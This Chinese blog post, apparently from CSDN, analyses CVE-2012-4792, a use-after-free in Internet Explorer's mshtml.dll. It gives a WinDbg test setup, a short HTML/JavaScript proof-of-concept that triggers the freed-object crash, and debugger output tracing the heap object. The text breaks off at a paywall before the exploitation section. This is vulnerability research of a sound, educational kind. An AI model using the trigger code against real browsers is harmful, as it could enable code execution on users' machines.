漏洞分析之CVE-2012-4792(UAF)

最新推荐文章于 2024-09-21 15:46:10 发布
最新推荐文章于 2024-09-21 15:46:10 发布
阅读量2.5k 收藏 1
点赞数
分类专栏: 漏洞调试 文章标签: cve 漏洞 ie
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_31481187/article/details/73865666
版权
本文深入分析了CVE-2012-4792,这是一个影响IE 6至9的Use-After-Free漏洞。通过测试环境验证,探讨了漏洞的创建、释放、重用过程,以及如何利用此漏洞通过堆喷射技术和ROP链执行恶意代码。实验结果显示,该漏洞可导致代码执行。
摘要由CSDN通过智能技术生成

0x00 漏洞简介

2012年9月,通用漏洞与披露平台发布了一个存在IE浏览器的UAF漏洞。
报告指出:Microsoft Internet Explorer 6至9版本中的mshtml.dll中的CMshtmlEd::Exec函数中存在释放后使用漏洞。远程攻击者可利用该漏洞通过特制的网站,执行任意代码。

0x01 测试环境

操作系统:Windows XP sp3

浏览器:IE 8.00.6001.18702

漏洞文件:mshtml 8.00.6001.18702

调试器:windbg x86

利用windbg辅助工具设置系统堆栈调试功能

C:\Documents and Settings\Administrator>gflags.exe -I iexplore.exe +hpa +ust
Current Registry Settings for iexplore.exe executable are: 02001000
    ust - Create user mode stack trace database
    hpa - Enable page heap

0x02 漏洞验证

首先给出一段简单的poc验证CVE漏洞

<!doctype html>
<html>
<head>
<script> 
function exploit()
{
    
     var e0 = null;
     var e1 = null;
     var e2 = null; 
     try {
          e0 = document.getElementById("a");
          e1 = document.createElement("div");
          e2 = document.createElement("q");
          e1.applyElement(e2);
          e1.appendChild(document.createElement('button'));
          e1.applyElement(e0);
          e2.innerHTML = "";
          e2.appendChild(document.createElement('body'));
     } catch(e) { }
     CollectGarbage(); 
} 
</script> 
</head>
<body onload="exploit()">
<form id="a">
</form>
</body>
</html>

利用windbg attach IE 后 输入g继续运行运行,点击运行阻止的内容
这里写图片描述
这里写图片描述

观察windbg中代码停止的位置
这里写图片描述
结果发现edi(目测是一个申请堆的地址)是无效地址,程序崩溃。
这里应该取对象的虚表时发现地址不可取
这里写图片描述
下面会有调用虚表中的函数操作,那才是我们需要控制程序流的地方。

0x03 漏洞原理

首先我们利用!heap –p –a edi查看堆的相关操作
这里写图片描述

我们从中可以看到,edi已经是释放后的堆了,这里mov eax,dword ptr[edi]
又对释放后的堆,再次使用。

下面有几个关键的问题没有解决:

  1. 什么时候创建的堆
  2. 什么时候释放的堆
  3. 什么时候使用的堆

0x1 堆的创建

为了方便查找堆的创建,在windbg加载IE后查看所有关于CButton的函数
我们可以得到一些有用的信息

0:005> x mshtml!CButton::*
6a28f234 mshtml!CButton::HandleMessage = <no type information>
6a28ee18 mshtml!CButton::s_classdescTagButton = <no type information>
6a28ed83 mshtml!CButton::GetAAtype = <no type information>
6a28f862 mshtml!CButton::GetValueHelper = <no type information>
6a28ef62 mshtml!CButton::GetEnabled = <no type information>
6a28f36a mshtml!CButton::GetThemeState = <no type information>
6a28f75d mshtml!CButton::get_status = <no type information>
6a28ee41 mshtml!CButton::CreateElement = <no type information>//很明显是一个按钮创建的过程
6a28f035 mshtml!CButton::Notify = <no type information>
6a0c4750 mshtml!CButton::s_StringTable = <no type information>
6a28f1e0 mshtml!CButton::GetFocusShape = <no type information>
6a28f8eb mshtml!CButton::SetStatusText = <no type information>
6a28f70d mshtml!CButton::put_status = <no type information>
6a28f128 mshtml!CButton::YieldCurrency = <no type information>
6a0b0d8c mshtml!CButton::GetBtnHelper = <no type information>
6a28ef95 mshtml!CButton::GetBorderInfo = <no type information>
6a28f2f0 mshtml!CButton::ClickAction = <no type information>
6a298d55 mshtml!CButton::createTextRange = <no type information>
6a28f87d mshtml!CButton::SetValueHelper = <no type information>
6a28eda5 mshtml!CButton::GetClassDesc = <no type information>
6a28f3c2 mshtml!CButton::ApplyDefaultFormat = <no type information>
6a28ef0d mshtml!CButton::GetSubmitInfo = <no type information>
6a029d70 mshtml!CButton::s_apfnpdIHTMLButtonElement = <no type information>
6a0ad720 mshtml!CButton::s_acpi = <no type information>
6a0b0338 mshtml!CButton::GetNonThemedBorderInfo = <no type information>
6a28f10b mshtml!CButton::AddCtxInfoToStream = <no type information>
6a0c4740 mshtml!CButton::s_StringTableAggregate = <no type information>
6a28f337 mshtml!CButton::GetThemeProperties = <no type information>
6a28f7a3 mshtml!CButton::GetValue = <no type information>
6a28edf4 mshtml!CButton::s_classdescButtonSubmit = <no type information>
6a28eeb8 mshtml!CButton::Init2 = <no type information>
6a188ee4 mshtml!CButton::s_apHdlDescs = <no type information>
6a188f00 mshtml!CButton::s_ppropdescsInVtblOrderIHTMLButtonElement = <no type information>
6a28ed27 mshtml!CButton::`scalar deleting destructor' = <no type information>//猜测是按钮销毁的过程
6a0c4780 mshtml!CButton::s_AssocVTablePtr = <no type
最低0.47元/天 解锁文章
4ct10n
关注
专栏目录
UAF漏洞
m0_60584218的博客
02-27 2795
UAF漏洞 Use After Free 我们可以直接从字面上翻译它的意思:使用被释放的内存块。其实当一个内存块被释放之后重新使用有如下几种情况: 内存块被释放后,其对应的指针被设置为NULL,再次使用时程序会崩溃 内存块被释放后,其对应的指针没有被设置为NULL,在它下一次被使用之前,没有代码对这块内存块进行修改,那么程序有可能可以正常运转 内存块被释放后,其对应的指针没有被设置为NULL,但是在下一次使用之前,有代码对这块内存进行了修改,那么当程序再次使用这块内存时,就很有可能出现问题。 D
IE UAF 漏洞CVE-2012-4969)漏洞分析与利用
giantbranch的专栏
04-05 5351
简介 这是一个UAF漏洞 实验环境 Windows 7 Sp1 32位 IE 8 windbg IDA mona 漏洞分析 搜了一下metasploit那里有,于是就直接生成exp咯 msf > search CVE-2012-4969 Matching Modules ================ Name
CVE-2012-4792
nethm的专栏
09-23 285
预留
漏洞——CVE常见漏洞与暴露、CWE常见弱点枚举
最新发布
计算机硕士的博客
09-21 615
漏洞——CVE常见漏洞与暴露、CWE常见弱点枚举。
CVE-2012-4792Microsoft Internet Explorer 释放后使用漏洞
weixin_30809173的博客
08-16 244
Microsoft Internet Explorer是微软Windows操作系统中默认捆绑的WEB浏览器。 Microsoft Internet Explorer 6至8版本中存在释放后使用漏洞。通过特制的网站触发对(1)未被正确分配的或(2)已删除的对象的访问,远程攻击者可利用该漏洞执行任意代码。目前已经证实CDwnBindInfo对象可触发此漏洞。 ...
CVE-2012-4792 漏洞利用学习笔记
Hanxinyi930702的博客
07-30 797
前面一篇学习了下怎么用ClassName或者title来进行占位,现在学习下如何利用该漏洞 对于UAF漏洞的利用,最简单的就是通过Heap Spary来实现了,国外的大神也提出了一种不用Heap Spary,直接构造一个对象来利用的方法 现在学习一下这两种方法,漏洞利用环境为win7 32位+ie8,我们需要解决的问题有: 1.如果精确进行Heap Spary 2.如何bypas...
UAF漏洞利用原理分析
qq_29317353的博客
12-25 991
二进制安全,UAF漏洞分析学习
CVE-2012-4969漏洞分析
02-29
CVE-2012-4969是一个存在在Microsoft Internet Explorer 6至9版本中的UAF(Use-after-free)漏洞UAF漏洞是指攻击者通过特定手段在某个对象被释放后再次进行访问,这可能会导致内存损坏或者恶意代码的执行。在CVE-...
linux内核UAF漏洞分析CVE-2018-17182
yiduoxiaoxx的博客
02-26 2173
1.漏洞原理分析 1.1 vma缓存机制 vma就是虚拟地址区域(virtual memory area),内核用vma来管理进程分配的虚拟内存地址。vma在内核中用结构体struct vm_ares_struct 表示,定义如下: struct vm_area_struct { unsigned long vm_start; // 起始虚拟地址 unsig...
CVE-2018-17182:Linux内核VMA-UAF提权突破(CVE-2018-17182),0天
03-20
Linux内核VMA-UAF提权突破(CVE-2018-17182) 关于 Google Project Zero的网络安全研究人员发布了详细信息,并针对自内核版本3.16至4.18.8以来Linux内核中存在的高严重性漏洞的概念验证(PoC)漏洞利用。 由白帽...
pwnable.kr-uaf WP
Casuall的博客
06-22 539
UAF(Use After Free)释放后重用,其实是一种指针未置空造成的漏洞。 首先介绍一下迷途指针的概念 在计算机编程领域中,迷途指针,或称悬空指针、野指针,指的是不指向任何合法的对象的指针。 当所指向的对象被释放或者收回,但是对该指针没有作任何的修改,以至于该指针仍旧指向已经回收的内存地址,此情况下该指针便称迷途指针。若操作系统将这部分已经释放的内存重新分配给另外一个进程,而原来的程序重...
未初始化UAF漏洞
04-26
释放重引用(UAF)或者未初始化漏洞题目,
滤波器UAF42原理及应用
12-04
本文档提供滤波器UAF42的详细介绍,它具有涉及方便,使用灵活的特点。
UAF (Use After Free)漏洞分析及利用
热门推荐
4ct10n
06-23 3万+
因为大作业的需求要调试一个浏览器的UAF漏洞,首先必须对UAF漏洞有个整体的了解,本篇文章主要讲解UAF造成的原因以及利用方法,这里结合2016年HCTF fheap
漏洞学习笔记——UAF漏洞
谈成(C/C++)
04-30 1561
UAF即为Use After Free。也就是使用了已经被释放的内存,最终导致内存崩溃或任意代码被执行的漏洞UAF漏洞常见于浏览器中,如IE、Chrome、Firefox等。 当分配有内存的指针被释放后,如果指针没有及时置空。那么此时的指针就被称为“悬挂指针”,也就是俗称的野指针。引用此类指针就会出现各种意外情况。举例以下代码。 #include "stdafx.h" #include <stdlib.h> #include <tchar.h> #include <windo
Windows内核漏洞学习-UAF
WocW的博客
05-20 911
0x00:前言 本章所提到的漏洞UAF(释放后利用),这也是目前我所接触到的第一个复杂一点的内核漏洞。参考文章: 传送门 0x01:漏洞原理 NTSTATUS FreeUaFObject() { NTSTATUS Status = STATUS_UNSUCCESSFUL; PAGED_CODE(); __try { if (g_UseAfterFreeObject) { DbgPrint("[+] Freeing UaF Object
安全漏洞--释放重引用(UAF)漏洞分析
关注互联网安全的小虾米一枚
04-26 6649
漏洞简介 未初始化漏洞一般是指堆栈变量没有设置就使用导致,或者可能更多的是部分初始化导致。 释放后再用漏洞是堆上的数据被释放后,某个残留地址没清除再用导致。其实就是未初始化漏洞。 二 原理分析 windows系统测试代码 #include #include int main(int argc, char * argv[])
CVE-2012-4792 Exploit Without HeapSpary
Hanxinyi930702的博客
07-30 205
前面的一篇用HeapSpary完成了在win7下绕过DEP及ASLR的利用,这次同样一CVE-2012-4792做为例子,前面读国外一篇文章: http://blog.exodusintel.com/2013/01/02/happy-new-year-analysis-of-cve-2012-4792/ 文章提到用一种叫“HTML+TIME”的东西,通过该方法可以实现不需要Heap ...
漏洞扫描--需要整改的
冰恋云的专栏
07-18 1554
执行未经身份验证的代码。使用用户cookie,代理。中,DataBinder上的disallowedFields模式区分大小写,这意味着除非字段同时列出字段的第一个字符小写,包括属性路径中所有嵌套字段的第一个字符的大写。要创建ptrace关系的进程的凭据记录,这允许本地用户通过利用某些具有父子关系的场景来获得root访问权限进程关系,其中父级放弃特权并调用execve(可。限的经过身份验证的低权限用户都可以与文件管理器功能交互,例如从远程URL下载文件和更改文件权限(chmod)。......
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值